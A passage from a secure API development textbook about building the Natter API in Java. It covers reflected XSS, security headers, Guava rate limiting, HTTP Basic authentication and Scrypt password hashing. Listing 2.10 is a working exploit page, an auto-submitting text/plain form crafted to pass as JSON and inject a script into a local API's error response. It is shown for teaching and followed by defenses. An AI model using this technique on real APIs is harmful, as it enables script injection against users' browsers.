apps (SPAs) it’s common for web browser clients to talk directly to an API. For this
reason, it’s essential that an API take basic precautions to avoid producing output
that might be interpreted as a script when processed by a web browser.
2 See https://scotthelme.co.uk/edge-to-remove-xss-auditor/ for a discussion of the implications of Microsoft’s
announcement. Firefox never implemented the protections in the first place, so this protection will soon be
gone from most major browsers. At the time of writing, Safari was the only browser I found that blocked the
attack by default.
55
Producing safe output
filters, including exception handlers). Open the Main.java file in your editor and add
the following lines to the end of the main method:
afterAfter((request, response) -> {
response.header("X-XSS-Protection", "0");
});
The X-XSS-Protection header is usually used to ensure browser protections are turned
on, but in this case, you’ll turn them off temporarily to allow the bug to be exploited.
NOTE
The XSS protections in browsers have been found to cause security
vulnerabilities of their own in some cases. The OWASP project now recom-
mends always disabling the filter with the X-XSS-Protection: 0 header as
shown previously.
With that done, you can create a malicious HTML file that exploits the bug. Open your
text editor and create a file called xss.html and copy the contents of listing 2.10 into it.
Save the file and double-click on it or otherwise open it in your web browser. The file
includes a HTML form with the enctype attribute set to text/plain. This instructs the
web browser to format the fields in the form as plain text field=value pairs, which you
are exploiting to make the output look like valid JSON. You should also include a small
piece of JavaScript to auto-submit the form as soon as the page loads.
<!DOCTYPE html>
<html>
<body>
<form id="test" action="http://localhost:4567/spaces"
method="post" enctype="text/plain">
<input type="hidden" name='{"x":"'
value='","name":"x",
➥ "owner":"<script>alert('XSS!');
➥ </script>"}' />
</form>
<script type="text/javascript">
document.getElementById("test").submit();
</script>
</body>
</html>
If all goes as expected, you should get a pop-up in your browser with the “XSS” message.
So, what happened? The sequence of events is shown in figure 2.8, and is as follows:
1
When the form is submitted, the browser sends a POST request to http:/ /local-
host:4567/spaces with a Content-Type header of text/plain and the hidden
form field as the value. When the browser submits the form, it takes each form
element and submits them as name=value pairs. The <, > and '
HTML entities are replaced with the literal values <, >, and ' respectively.
Listing 2.10
Exploiting a reflected XSS
The form is configured to POST
with Content-Type text/plain.
You carefully craft the form
input to be valid JSON with a
script in the “owner” field.
Once the page loads, you
automatically submit the
form using JavaScript.
56
CHAPTER 2
Secure API development
2
The name of your hidden input field is '{"x":"', although the value is your
long malicious script. When the two are put together the API will see the follow-
ing form input:
{"x":"=","name":"x","owner":"<script>alert('XSS!');</script>"}
3
The API sees a valid JSON input and ignores the extra “x” field (which you only
added to cleverly hide the equals sign that the browser inserted). But the API
rejects the username as invalid, echoing it back in the response:
{"error": "java.lang.IllegalArgumentException: invalid username:
<script>alert('XSS!');</script>"}
4
Because your error response was served with the default Content-Type of
text/html, the browser happily interprets the response as HTML and executes
the script, resulting in the XSS popup.
Submit
1. Hidden form fields
are carefully crafted
in the HTML page.
{"x":"=","name
":"x","owner":
"<script>alert
('XSS!');</
script>"}
Content-Type: text/plain
2. The form payload
ends up looking like
valid JSON.
Web browser
Natter API
Web browser
Natter API
{“x”:”
“,”name”:”x”,...
XSS!
0 0 0
0 0 0
{"error":
"...:
<script>alert
('XSS!');</
script>"}
Content-Type: text/html
3. The Natter API receives
the malicious request . . .
. . . and reflects the invalid
input back to the web
browser as HTML.
4. The browser executes the embedded
script, resulting in a popup window.
Figure 2.8
A reflected cross-site scripting (XSS) attack against your API can occur when an attacker
gets a web browser client to submit a form with carefully crafted input fields. When submitted, the
form looks like valid JSON to the API, which parses it but then produces an error message. Because
the response is incorrectly returned with a HTML content-type, the malicious script that the attacker
provided is executed by the web browser client.
57
Producing safe output
Developers sometimes assume that if they produce valid JSON output then XSS is not
a threat to a REST API. In this case, the API both consumed and produced valid JSON
and yet it was possible for an attacker to exploit an XSS vulnerability anyway.
2.6.2
Preventing XSS
So, how do you fix this? There are several steps that can be taken to avoid your API
being used to launch XSS attacks against web browser clients:
Be strict in what you accept. If your API consumes JSON input, then require
that all requests include a Content-Type header set to application/json. This
prevents the form submission tricks that you used in this example, as a HTML
form cannot submit application/json content.
Ensure all outputs are well-formed using a proper JSON library rather than by
concatenating strings.
Produce correct Content-Type headers on all your API’s responses, and never
assume the defaults are sensible. Check error responses in particular, as these
are often configured to produce HTML by default.
If you parse the Accept header to decide what kind of output to produce, never
simply copy the value of that header into the response. Always explicitly specify
the Content-Type that your API has produced.
Additionally, there are some standard security headers that you can add to all API
responses to add additional protection for web browser clients (see table 2.1).
Table 2.1
Useful security headers
Security header
Description
Comments
X-XSS-Protection
Tells the browser
whether to block/ignore
suspected XSS attacks.
The current guidance is to set to “0” on API
responses to completely disable these protections
due to security issues they can introduce.
X-Content-Type-
Options
Set to nosniff to pre-
vent the browser guess-
ing the correct Content-
Type.
Without this header, the browser may ignore your
Content-Type header and guess (sniff) what the
content really is. This can cause JSON output to be
interpreted as HTML or JavaScript, so always add
this header.
X-Frame-Options
Set to DENY to prevent
your API responses being
loaded in a frame or
iframe.
In an attack known as drag ‘n’ drop clickjacking,
the attacker loads a JSON response into a hidden
iframe and tricks a user into dragging the data into
a frame controlled by the attacker, potentially
revealing sensitive information. This header pre-
vents this attack in older browsers but has been
replaced by Content Security Policy in newer
browsers (see below). It is worth setting both
headers for now.
58
CHAPTER 2
Secure API development
Modern web browsers also support the Content-Security-Policy header (CSP) that
can be used to reduce the scope for XSS attacks by restricting where scripts can be
loaded from and what they can do. CSP is a valuable defense against XSS in a web
application. For a REST API, many of the CSP directives are not applicable but it is
worth including a minimal CSP header on your API responses so that if an attacker
does manage to exploit an XSS vulnerability they are restricted in what they can do.
Table 2.2 lists the directives I recommend for a HTTP API. The recommended header
for a HTTP API response is:
Content-Security-Policy: default-src 'none';
➥ frame-ancestors 'none'; sandbox
2.6.3
Implementing the protections
You should now update the API to implement these protections. You’ll add some filters
that run before and after each request to enforce the recommended security settings.
First, add a before() filter that runs before each request and checks that any
POST body submitted to the API has a correct Content-Type header of application/
json. The Natter API only accepts input from POST requests, but if your API handles
other request methods that may contain a body (such as PUT or PATCH requests),
then you should also enforce this filter for those methods. If the content type is incor-
rect, then you should return a 415 Unsupported Media Type status, because this is the
Cache-Control
and Expires
Controls whether brows-
ers and proxies can
cache content in the
response and for
how long.
These headers should always be set correctly to
avoid sensitive data being retained in the browser
or network caches. It can be useful to set default
cache headers in a before() filter, to allow spe-
cific endpoints to override it if they have more
specific caching requirements. The safest default is
to disable caching completely using the no-store
directive and then selectively re-enable caching for
individual requests if necessary. The Pragma:
no-cache header can be used to disable caching
for older HTTP/1.0 caches.
Table 2.2
Recommended CSP directives for REST responses
Directive
Value
Purpose
default-src
'none'
Prevents the response from loading any scripts or resources.
frame-ancestors
'none'
A replacement for X-Frame-Options, this prevents the response
being loaded into an iframe.
sandbox
n/a
Disables scripts and other potentially dangerous content from being
executed.
Table 2.1
Useful security headers (continued)
Security header
Description
Comments
59
Producing safe output
standard status code for this case. You should also explicitly indicate the UTF-8 character-
encoding in the response, to avoid tricks for stealing JSON data by specifying a different
encoding such as UTF-16BE (see https://portswigger.net/blog/json-hijacking-for-the-
modern-web for details).
Secondly, you’ll add a filter that runs after all requests to add our recommended
security headers to the response. You’ll add this as a Spark afterAfter() filter, which
ensures that the headers will get added to error responses as well as normal responses.
Listing 2.11 shows your updated main method, incorporating these improve-
ments. Locate the Main.java file under natter-api/src/main/java/com/manning/
apisecurityinaction and open it in your editor. Add the filters to the main() method
below the code that you’ve already written.
public static void main(String... args) throws Exception {
..
before(((request, response) -> {
if (request.requestMethod().equals("POST") &&
!"application/json".equals(request.contentType())) {
halt(415, new JSONObject().put(
"error", "Only application/json supported"
).toString());
}
}));
afterAfter((request, response) -> {
response.type("application/json;charset=utf-8");
response.header("X-Content-Type-Options", "nosniff");
response.header("X-Frame-Options", "DENY");
response.header("X-XSS-Protection", "0");
response.header("Cache-Control", "no-store");
response.header("Content-Security-Policy",
"default-src 'none'; frame-ancestors 'none'; sandbox");
response.header("Server", "");
});
internalServerError(new JSONObject()
.put("error", "internal server error").toString());
notFound(new JSONObject()
.put("error", "not found").toString());
exception(IllegalArgumentException.class, Main::badRequest);
exception(JSONException.class, Main::badRequest);
}
private static void badRequest(Exception ex,
Request request, Response response) {
response.status(400);
response.body(new JSONObject()
.put("error", ex.getMessage()).toString());
}
Listing 2.11
Hardening your REST endpoints
Enforce a correct
Content-Type on
all methods that
receive input in
the request body.
Return a standard 415
Unsupported Media Type
response for invalid
Content-Types.
Collect all your standard
security headers into a
filter that runs after
everything else.
Use a proper JSON
library for all outputs.
60
CHAPTER 2
Secure API development
You should also alter your exceptions to not echo back malformed user input in any
case. Although the security headers should prevent any bad effects, it’s best practice
not to include user input in error responses just to be sure. It’s easy for a security
header to be accidentally removed, so you should avoid the issue in the first place by
returning a more generic error message:
if (!owner.matches("[a-zA-Z][a-zA-Z0-9]{0,29}")) {
throw new IllegalArgumentException("invalid username");
}
If you must include user input in error messages, then consider sanitizing it first using
a robust library such as the OWASP HTML Sanitizer (https://github.com/OWASP/
java-html-sanitizer) or JSON Sanitizer. This will remove a wide variety of potential XSS
attack vectors.
Answers to pop quiz questions
1
e. Cross-Site Request Forgery (CSRF) was in the Top 10 for many years but has
declined in importance due to improved defenses in web frameworks. CSRF
attacks and defenses are covered in chapter 4.
2
g. Messages from John and all users’ passwords will be returned from the query.
This is known as an SQL injection UNION attack and shows that an attacker is
not limited to retrieving data from the tables involved in the original query but
can also query other tables in the database.
Pop quiz
4
Which security header should be used to prevent web browsers from ignoring the
Content-Type header on a response?
a
Cache-Control
b
Content-Security-Policy
c
X-Frame-Options: deny
d
X-Content-Type-Options: nosniff
e
X-XSS-Protection: 1; mode=block
5
Suppose that your API can produce output in either JSON or XML format, accord-
ing to the Accept header sent by the client. Which of the following should you
not do? (There may be more than one correct answer.)
a
Set the X-Content-Type-Options header.
b
Include un-sanitized input values in error messages.
c
Produce output using a well-tested JSON or XML library.
d
Ensure the Content-Type is correct on any default error responses.
e
Copy the Accept header directly to the Content-Type header in the response.
The answers are at the end of the chapter.
61
Summary
3
b. The attacker can get the program to allocate large byte arrays based on user
input. For a Java int value, the maximum would be a 2GB array, which would
probably allow the attacker to exhaust all available memory with a few requests.
Although passing invalid values is an annoyance, recall from the start of sec-
tion 2.5 that Java is a memory-safe language and so these will result in excep-
tions rather than insecure behavior.
4
d. X-Content-Type-Options: nosniff instructs browsers to respect the Con-
tent-Type header on the response.
5
b and e. You should never include unsanitized input values in error messages,
as this may allow an attacker to inject XSS scripts. You should also never copy
the Accept header from the request into the Content-Type header of a response,
but instead construct it from scratch based on the actual content type that was
produced.
Summary
SQL injection attacks can be avoided by using prepared statements and param-
eterized queries.
Database users should be configured to have the minimum privileges they need
to perform their tasks. If the API is ever compromised, this limits the damage
that can be done.
Inputs should be validated before use to ensure they match expectations. Regu-
lar expressions are a useful tool for input validation, but you should avoid
ReDoS attacks.
Even if your API does not produce HTML output, you should protect web
browser clients from XSS attacks by ensuring correct JSON is produced with
correct headers to prevent browsers misinterpreting responses as HTML.
Standard HTTP security headers should be applied to all responses, to ensure
that attackers cannot exploit ambiguity in how browsers process results. Make
sure to double-check all error responses, as these are often forgotten.
62
Securing the Natter API
In the last chapter you learned how to develop the functionality of your API while
avoiding common security flaws. In this chapter you’ll go beyond basic functional-
ity and see how proactive security mechanisms can be added to your API to ensure
all requests are from genuine users and properly authorized. You’ll protect the Nat-
ter API that you developed in chapter 2, applying effective password authentication
using Scrypt, locking down communications with HTTPS, and preventing denial of
service attacks using the Guava rate-limiting library.
This chapter covers
Authenticating users with HTTP Basic
authentication
Authorizing requests with access control lists
Ensuring accountability through audit logging
Mitigating denial of service attacks with rate-
limiting
63
Addressing threats with security controls
3.1
Addressing threats with security controls
You’ll protect the Natter API against common threats by applying some basic security
mechanisms (also known as security controls). Figure 3.1 shows the new mechanisms
that you’ll develop, and you can relate each of them to a STRIDE threat (chapter 1)
that they prevent:
Rate-limiting is used to prevent users overwhelming your API with requests, limit-
ing denial of service threats.
Encryption ensures that data is kept confidential when sent to or from the API
and when stored on disk, preventing information disclosure. Modern encryp-
tion also prevents data being tampered with.
Authentication makes sure that users are who they say they are, preventing spoof-
ing. This is essential for accountability, but also a foundation for other security
controls.
Audit logging is the basis for accountability, to prevent repudiation threats.
Finally, you’ll apply access control to preserve confidentiality and integrity, pre-
venting information disclosure, tampering and elevation of privilege attacks.
NOTE
An important detail, shown in figure 3.1, is that only rate-limiting and
access control directly reject requests. A failure in authentication does not
User
Clients
Web browser
Your API
Audit log
Authentication
Application
logic
Access control
Rate-limiting
Mobile app
Security controls
Rate-limiting
rejects requests
when the API
is overloaded.
Authentication
ensures users
are who they say
they are.
An audit
log records
who did what
and when.
Access control decides
whether a request is
allowed or denied.
Encryption protects data
in transit and at rest.
HTTPS
Figure 3.1
Applying security controls to the Natter API. Encryption prevents information disclosure.
Rate-limiting protects availability. Authentication is used to ensure that users are who they say they
are. Audit logging records who did what, to support accountability. Access control is then applied to
enforce integrity and confidentiality.
64
CHAPTER 3
Securing the Natter API
immediately cause a request to fail, but a later access control decision may
reject a request if it is not authenticated. This is important because we want to
ensure that even failed requests are logged, which they would not be if the
authentication process immediately rejected unauthenticated requests.
Together these five basic security controls address the six basic STRIDE threats of
spoofing, tampering, repudiation, information disclosure, denial of service, and eleva-
tion of privilege that were discussed in chapter 1. Each security control is discussed
and implemented in the rest of this chapter.
3.2
Rate-limiting for availability
Threats against availability, such as denial of service (DoS) attacks, can be very difficult
to prevent entirely. Such attacks are often carried out using hijacked computing
resources, allowing an attacker to generate large amounts of traffic with little cost to
themselves. Defending against a DoS attack, on the other hand, can require signifi-
cant resources, costing time and money. But there are several basic steps you can take
to reduce the opportunity for DoS attacks.
DEFINITION
A Denial of Service (DoS) attack aims to prevent legitimate users
from accessing your API. This can include physical attacks, such as unplug-
ging network cables, but more often involves generating large amounts of
traffic to overwhelm your servers. A distributed DoS (DDoS) attack uses many
machines across the internet to generate traffic, making it harder to block
than a single bad client.
Many DoS attacks are caused using unauthenticated requests. One simple way to limit
these kinds of attacks is to never let unauthenticated requests consume resources on
your servers. Authentication is covered in section 3.3 and should be applied immedi-
ately after rate-limiting before any other processing. However, authentication itself
can be expensive so this doesn’t eliminate DoS threats on its own.
NOTE
Never allow unauthenticated requests to consume significant resources
on your server.
Many DDoS attacks rely on some form of amplification so that an unauthenticated
request to one API results in a much larger response that can be directed at the real tar-
get. A popular example are DNS amplification attacks, which take advantage of the unau-
thenticated Domain Name System (DNS) that maps host and domain names into IP
addresses. By spoofing the return address for a DNS query, an attacker can trick the
DNS server into flooding the victim with responses to DNS requests that they never sent.
If enough DNS servers can be recruited into the attack, then a very large amount of
traffic can be generated from a much smaller amount of request traffic, as shown in
figure 3.2. By sending requests from a network of compromised machines (known as a
botnet), the attacker can generate very large amounts of traffic to the victim at little cost
to themselves. DNS amplification is an example of a network-level DoS attack. These
65
Rate-limiting for availability
attacks can be mitigated by filtering out harmful traffic entering your network using a
firewall. Very large attacks can often only be handled by specialist DoS protection ser-
vices provided by companies that have enough network capacity to handle the load.
TIP
Amplification attacks usually exploit weaknesses in protocols based on
UDP (User Datagram Protocol), which are popular in the Internet of Things
(IoT). Securing IoT APIs is covered in chapters 12 and 13.
Network-level DoS attacks can be easy to spot because the traffic is unrelated to legiti-
mate requests to your API. Application-layer DoS attacks attempt to overwhelm an API by
sending valid requests, but at much higher rates than a normal client. A basic defense
against application-layer DoS attacks is to apply rate-limiting to all requests, ensuring
that you never attempt to process more requests than your server can handle. It is bet-
ter to reject some requests in this case, than to crash trying to process everything. Gen-
uine clients can retry their requests later when the system has returned to normal.
DEFINITION
Application-layer DoS attacks (also known as layer-7 or L7 DoS) send
syntactically valid requests to your API but try to overwhelm it by sending a
very large volume of requests.
Rate-limiting should be the very first security decision made when a request reaches
your API. Because the goal of rate-limiting is ensuring that your API has enough
resources to be able to process accepted requests, you need to ensure that requests
that exceed your API’s capacities are rejected quickly and very early in processing.
Other security controls, such as authentication, can use significant resources, so rate-
limiting must be applied before those processes, as shown in figure 3.3.
Attacker
Victim
DNS server
DNS server
DNS server
Attacker sends
small requests to
multiple DNS servers,
spoofing the return
IP address.
The DNS servers
reply with much
larger responses to
the victim’s machine.
Figure 3.2
In a DNS amplification attack, the attacker sends the same DNS query to many DNS
servers, spoofing their IP address to look like the request came from the victim. By carefully
choosing the DNS query, the server can be tricked into replying with much more data than was in
the original query, flooding the victim with traffic.
66
CHAPTER 3
Securing the Natter API
TIP
You should implement rate-limiting as early as possible, ideally at a load
balancer or reverse proxy before requests even reach your API servers. Rate-
limiting configuration varies from product to product. See https://medium
.com/faun/understanding-rate-limiting-on-haproxy-b0cf500310b1 for an exam-
ple of configuring rate-limiting for the open source HAProxy load balancer.
3.2.1
Rate-limiting with Guava
Often rate-limiting is applied at a reverse proxy, API gateway, or load balancer before
the request reaches the API, so that it can be applied to all requests arriving at a clus-
ter of servers. By handling this at a proxy server, you also avoid excess load being gen-
erated on your application servers. In this example you’ll apply simple rate-limiting in
the API server itself using Google’s Guava library. Even if you enforce rate-limiting at a
proxy server, it is good security practice to also enforce rate limits in each server so
that if the proxy server misbehaves or is misconfigured, it is still difficult to bring down
the individual servers. This is an instance of the general security principle known as
defense in depth, which aims to ensure that no failure of a single mechanism is enough
to compromise your API.
DEFINITION
The principle of defense in depth states that multiple layers of secu-
rity defenses should be used so that a failure in any one layer is not enough to
breach the security of the whole system.
As you’ll now discover, there are libraries available to make basic rate-limiting very easy
to add to your API, while more complex requirements can be met with off-the-shelf
Web
Natter API
Audit log
Authentication
Application
logic
Access control
Rate-limiting
Mobile
When the rate limit is
exceeded, requests are
immediately rejected with
a 429 Too Many Requests
HTTP status code.
Request
Response
When the rate limit is
not exceeded, requests
proceed as normal.
Figure 3.3
Rate-limiting rejects requests when your API is under too much load. By rejecting
requests early before they have consumed too many resources, we can ensure that the
requests we do process have enough resources to complete without errors. Rate-limiting
should be the very first decision applied to incoming requests.
67
Rate-limiting for availability
proxy/gateway products. Open the pom.xml file in your editor and add the following
dependency to the dependencies section:
<dependency>
<groupId>com.google.guava</groupId>
<artifactId>guava</artifactId>
<version>29.0-jre</version>
</dependency>
Guava makes it very simple to implement rate-limiting using the RateLimiter class
that allows us to define the rate of requests per second you want to allow.1 You can
then either block and wait until the rate reduces, or you can simply reject the request
as we do in the next listing. The standard HTTP 429 Too Many Requests status code2
can be used to indicate that rate-limiting has been applied and that the client should
try the request again later. You can also send a Retry-After header to indicate how
many seconds the client should wait before trying again. Set a low limit of 2 requests
per second to make it easy to see it in action. The rate limiter should be the very first
filter defined in your main method, because even authentication and audit logging
may consume resources.
TIP
The rate limit for individual servers should be a fraction of the overall
rate limit you want your service to handle. If your service needs to handle a
thousand requests per second, and you have 10 servers, then the per-server
rate limit should be around 100 request per second. You should verify that
each server is able to handle this maximum rate.
Open the Main.java file in your editor and add an import for Guava to the top of
the file:
import com.google.common.util.concurrent.*;
Then, in the main method, after initializing the database and constructing the control-
ler objects, add the code in the listing 3.1 to create the RateLimiter object and add a
filter to reject any requests once the rate limit has been exceeded. We use the non-
blocking tryAcquire() method that returns false if the request should be rejected.
var rateLimiter = RateLimiter.create(2.0d);
before((request, response) -> {
if (!rateLimiter.tryAcquire()) {
1 The RateLimiter class is marked as unstable in Guava, so it may change in future versions.
2 Some services return a 503 Service Unavailable status instead. Either is acceptable, but 429 is more accurate,
especially if you perform per-client rate-limiting.
Listing 3.1
Applying rate-limiting with Guava
Create the shared rate
limiter object and allow just
2 API requests per second.
Check if the rate has
been exceeded.
68
CHAPTER 3
Securing the Natter API
response.header("Retry-After", "2");
halt(429);
}
});
Guava’s rate limiter is quite basic, defining only a simple requests per second rate. It
has additional features, such as being able to consume more permits for more expen-
sive API operations. It lacks more advanced features, such as being able to cope with
occasional bursts of activity, but it’s perfectly fine as a basic defensive measure that can
be incorporated into an API in a few lines of code. You can try it out on the command
line to see it in action:
$ for i in {1..5}
> do
> curl -i -d "{\"owner\":\"test\",\"name\":\"space$i\"}"
➥ -H ‘Content-Type: application/json’
➥ http://localhost:4567/spaces;
> done
HTTP/1.1 201 Created
Date: Wed, 06 Feb 2019 21:07:21 GMT
Location: /spaces/1
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
Cache-Control: no-store
Content-Security-Policy: default-src ‘none’; frame-ancestors ‘none’; sandbox
Server:
Transfer-Encoding: chunked
HTTP/1.1 201 Created
Date: Wed, 06 Feb 2019 21:07:21 GMT
Location: /spaces/2
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
Cache-Control: no-store
Content-Security-Policy: default-src ‘none’; frame-ancestors ‘none’; sandbox
Server:
Transfer-Encoding: chunked
HTTP/1.1 201 Created
Date: Wed, 06 Feb 2019 21:07:22 GMT
Location: /spaces/3
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
Cache-Control: no-store
Content-Security-Policy: default-src ‘none’; frame-ancestors ‘none’; sandbox
Server:
Transfer-Encoding: chunked
If so, add a Retry-After
header indicating when
the client should retry.
Return a 429 Too
Many Requests
status.
The first
requests
succeed
while the
rate limit
is not
exceeded.
69
Rate-limiting for availability
HTTP/1.1 429 Too Many Requests
Date: Wed, 06 Feb 2019 21:07:22 GMT
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
Cache-Control: no-store
Content-Security-Policy: default-src ‘none’; frame-ancestors ‘none’; sandbox
Server:
Transfer-Encoding: chunked
HTTP/1.1 429 Too Many Requests
Date: Wed, 06 Feb 2019 21:07:22 GMT
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
Cache-Control: no-store
Content-Security-Policy: default-src ‘none’; frame-ancestors ‘none’; sandbox
Server:
Transfer-Encoding: chunked
By returning a 429 response immediately, you can limit the amount of work that your
API is performing to the bare minimum, allowing it to use those resources for serving
the requests that it can handle. The rate limit should always be set below what you
think your servers can handle, to give some wiggle room.
Pop quiz
1
Which one of the following statements is true about rate-limiting?
a
Rate-limiting should occur after access control.
b
Rate-limiting stops all denial of service attacks.
c
Rate-limiting should be enforced as early as possible.
d
Rate-limiting is only needed for APIs that have a lot of clients.
2
Which HTTP response header can be used to indicate how long a client should
wait before sending any more requests?
a
Expires
b
Retry-After
c
Last-Modified
d
Content-Security-Policy
e
Access-Control-Max-Age
The answers are at the end of the chapter.
Once the rate limit is exceeded, requests
are rejected with a 429 status code.
70
CHAPTER 3
Securing the Natter API
3.3
Authentication to prevent spoofing
Almost all operations in our API need to know who is performing them. When you talk
to a friend in real life, you recognize them based on their appearance and physical fea-
tures. In the online world, such instant identification is not usually possible. Instead, we
rely on people to tell us who they are. But what if they are not honest? For a social app,
users may be able to impersonate each other to spread rumors and cause friends to fall
out. For a banking API, it would be catastrophic if users can easily pretend to be some-
body else and spend their money. Almost all security starts with authentication, which is
the process of verifying that a user is who they say they are.
Figure 3.4 shows how authentication fits within the security controls that you’ll add
to the API in this chapter. Apart from rate-limiting (which is applied to all requests
regardless of who they come from), authentication is the first process we perform.
Downstream security controls, such as audit logging and access control, will almost
always need to know who the user is. It is important to realize that the authentication
phase itself shouldn’t reject a request even if authentication fails. Deciding whether
any particular request requires the user to be authenticated is the job of access control
(covered later in this chapter), and your API may allow some requests to be carried
out anonymously. Instead, the authentication process will populate the request with
attributes indicating whether the user was correctly authenticated that can be used by
these downstream processes.
Web browser
Natter API
Audit log
Authentication
Application
logic
All requests proceed,
even if authentication
was not successful,
to ensure they are logged.
Response
Access control
User
DB
Rate-limiting
Mobile app
Requests will be rejected
later during access control
if authentication is required.
Request
Figure 3.4
Authentication occurs after rate-limiting but before audit logging or access
control. All requests proceed, even if authentication fails, to ensure that they are always
logged. Unauthenticated requests will be rejected during access control, which occurs after
audit logging.
71
Authentication to prevent spoofing
In the Natter API, a user makes a claim of identity in two places:
1
In the Create Space operation, the request includes an “owner” field that iden-
tifies the user creating the space.
2
In the Post Message operation, the user identifies themselves in the “author”
field.
The operations to read messages currently don’t identify who is asking for those mes-
sages at all, meaning that we can’t tell if they should have access. You’ll correct both
problems by introducing authentication.
3.3.1
HTTP Basic authentication
There are many ways of authenticating a user, but one of the most widespread is sim-
ple username and password authentication. In a web application with a user interface,
we might implement this by presenting the user with a form to enter their username
and password. An API is not responsible for rendering a UI, so you can instead use the
standard HTTP Basic authentication mechanism to prompt for a password in a way
that doesn’t depend on any UI. This is a simple standard scheme, specified in RFC
7617 (https://tools.ietf.org/html/rfc7617), in which the username and password are
encoded (using Base64 encoding; https://en.wikipedia.org/wiki/Base64) and sent in
a header. An example of a Basic authentication header for the username demo and
password changeit is as follows:
Authorization: Basic ZGVtbzpjaGFuZ2VpdA==
The Authorization header is a standard HTTP header for sending credentials to the
server. It’s extensible, allowing different authentication schemes,3 but in this case
you’re using the Basic scheme. The credentials follow the authentication scheme
identifier. For Basic authentication, these consist of a string of the username followed
by a colon4 and then the password. The string is then converted into bytes (usually in
UTF-8, but the standard does not specify) and Base64-encoded, which you can see if
you decode it in jshell:
jshell> new String(
java.util.Base64.getDecoder().decode("ZGVtbzpjaGFuZ2VpdA=="), "UTF-8")
$3 ==> "demo:changeit"
WARNING
HTTP Basic credentials are easy to decode for anybody able to
read network messages between the client and the server. You should only
ever send passwords over an encrypted connection. You’ll add encryption to
the API communications in section 3.4.
3 The HTTP specifications unfortunately confuse the terms authentication and authorization. As you’ll see in
chapter 9, there are authorization schemes that do not involve authentication.
4 The username is not allowed to contain a colon.
72
CHAPTER 3
Securing the Natter API
3.3.2
Secure password storage with Scrypt
Web browsers have built-in support for HTTP Basic authentication (albeit with some
quirks that you’ll see later), as does curl and many other command-line tools. This
allows us to easily send a username and password to the API, but you need to securely
store and validate that password. A password hashing algorithm converts each password
into a fixed-length random-looking string. When the user tries to login, the password
they present is hashed using the same algorithm and compared to the hash stored in
the database. This allows the password to be checked without storing it directly. Mod-
ern password hashing algorithms, such as Argon2, Scrypt, Bcrypt, or PBKDF2, are
designed to resist a variety of attacks in case the hashed passwords are ever stolen. In
particular, they are designed to take a lot of time or memory to process to prevent
brute-force attacks to recover the passwords. You’ll use Scrypt in this chapter as it is
secure and widely implemented.
DEFINITION
A password hashing algorithm converts passwords into random-
looking fixed-size values known as a hash. A secure password hash uses a lot of
time and memory to slow down brute-force attacks such as dictionary attacks,
in which an attacker tries a list of common passwords to see if any match
the hash.
Locate the pom.xml file in the project and open it with your favorite editor. Add the
following Scrypt dependency to the dependencies section and then save the file:
<dependency>
<groupId>com.lambdaworks</groupId>
<artifactId>scrypt</artifactId>
<version>1.4.0</version>
</dependency>
TIP
You may be able to avoid implementing password storage yourself by
using an LDAP (Lightweight Directory Access Protocol) directory. LDAP serv-
ers often implement a range of secure password storage options. You can also
outsource authentication to another organization using a federation protocol
like SAML or OpenID Connect. OpenID Connect is discussed in chapter 7.
3.3.3
Creating the password database
Before you can authenticate any users, you need some way to register them. For now,
you’ll just allow any user to register by making a POST request to the /users end-
point, specifying their username and chosen password. You’ll add this endpoint in sec-
tion 3.3.4, but first let’s see how to store user passwords securely in the database.
TIP
In a real project, you could confirm the user’s identity during registra-
tion (by sending them an email or validating their credit card, for exam-
ple), or you might use an existing user repository and not allow users to
self-register.
73
Authentication to prevent spoofing
You’ll store users in a new dedicated database table, which you need to add to the
database schema. Open the schema.sql file under src/main/resources in your text
editor, and add the following table definition at the top of the file and save it:
CREATE TABLE users(
user_id VARCHAR(30) PRIMARY KEY,
pw_hash VARCHAR(255) NOT NULL
);
You also need to grant the natter_api_user permissions to read and insert into this
table, so add the following line to the end of the schema.sql file and save it again:
GRANT SELECT, INSERT ON users TO natter_api_user;
The table just contains the user id and their password hash. To store a new user, you
calculate the hash of their password and store that in the pw_hash column. In this
example, you’ll use the Scrypt library to hash the password and then use Dalesbred to
insert the hashed value into the database.
Scrypt takes several parameters to tune the amount of time and memory that it
will use. You do not need to understand these numbers, just know that larger num-
bers will use more CPU time and memory. You can use the recommended parame-
ters as of 2019 (see https://blog.filippo.io/the-scrypt-parameters/ for a discussion of
Scrypt parameters), which should take around 100ms on a single CPU and 32MiB
of memory:
String hash = SCryptUtil.scrypt(password, 32768, 8, 1);
This may seem an excessive amount of time and memory, but these parameters have
been carefully chosen based on the speed at which attackers can guess passwords.
Dedicated password cracking machines, which can be built for relatively modest
amounts of money, can try many millions or even billions of passwords per second.
The expensive time and memory requirements of secure password hashing algorithms
such as Scrypt reduce this to a few thousand passwords per second, hugely increasing
the cost for the attacker and giving users valuable time to change their passwords after
a breach is discovered. The latest NIST guidance on secure password storage (“memo-
rized secret verifiers” in the tortured language of NIST) recommends using strong
memory-hard hash functions such as Scrypt (https://pages.nist.gov/800-63-3/sp800-
63b.html#memsecret).
If you have particularly strict requirements on the performance of authentica-
tion to your system, then you can adjust the Scrypt parameters to reduce the time
and memory requirements to fit your needs. But you should aim to use the recom-
mended secure defaults until you know that they are causing an adverse impact on
performance. You should consider using other authentication methods if secure
password processing is too expensive for your application. Although there are pro-
tocols that allow offloading the cost of password hashing to the client, such as
74
CHAPTER 3
Securing the Natter API
SCRAM5 or OPAQUE,6 this is hard to do securely so you should consult an expert
before implementing such a solution.
PRINCIPLE
Establish secure defaults for all security-sensitive algorithms and
parameters used in your API. Only relax the values if there is no other way to
achieve your non-security requirements.
3.3.4
Registering users in the Natter API
Listing 3.2 shows a new UserController class with a method for registering a user:
First, you read the username and password from the input, making sure to vali-
date them both as you learned in chapter 2.
Then you calculate a fresh Scrypt hash of the password.
Finally, store the username and hash together in the database, using a prepared
statement to avoid SQL injection attacks.
Navigate to the folder src/main/java/com/manning/apisecurityinaction/controller
in your editor and create a new file UserController.java. Copy the contents of the list-
ing into the editor and save the new file.
package com.manning.apisecurityinaction.controller;
